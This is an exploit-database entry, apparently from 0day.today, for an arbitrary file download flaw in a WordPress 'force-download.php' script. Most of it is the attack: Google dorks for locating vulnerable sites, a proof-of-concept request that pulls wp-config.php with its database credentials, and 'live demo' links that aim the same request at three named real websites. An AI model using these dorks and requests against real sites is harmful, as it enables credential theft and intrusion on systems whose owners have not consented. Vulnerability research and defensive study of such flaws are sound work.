Wordpress force download Arbitrary File Download Vulnerability

2016-10-04T00:00:00
ID 1337DAY-ID-25278
Type zdt
Reporter xBADGIRL21
Modified 2016-10-04T00:00:00

Description

Exploit for php platform in category web applications

                                        
                                            ######################
# Exploit Title : Wordpress force download Arbitrary File Download
# Dork 1 : inurl:force-download.php?file=wp-content/uploads
# Dork 2 : inurl:wp-content/uploads inurl:force-download.php?file=
# Vendor Homepage : http://elouai.com/force-download.php
# Tested on: [ BACKBOX]
# skype:xbadgirl21
# Date: 07/08/2016
# video Proof : https://www.youtube.com/watch?v=V3o_17be8zY
######################
# PoC
######################
# [+] Using `force-download.php` file from `Wordpress websites we can download any file.
#
# [!] http://localhost/force-download.php?file=wp-config.php
#
######################
# Live Demo
######################
# [!] https://www.quantumib.com/force-download.php?file=wp-config.php
# [!] https://help.jin-soku.biz/force-download.php?file=wp-config.php
# [!] http://www.globalvoip.ca/force-download.php?file=wp-config.php
######################
# Discovered by : xBADGIRL21
# Greetz : All Mauritanien Hackers - NoWhere
######################

#  0day.today [2018-04-14]  #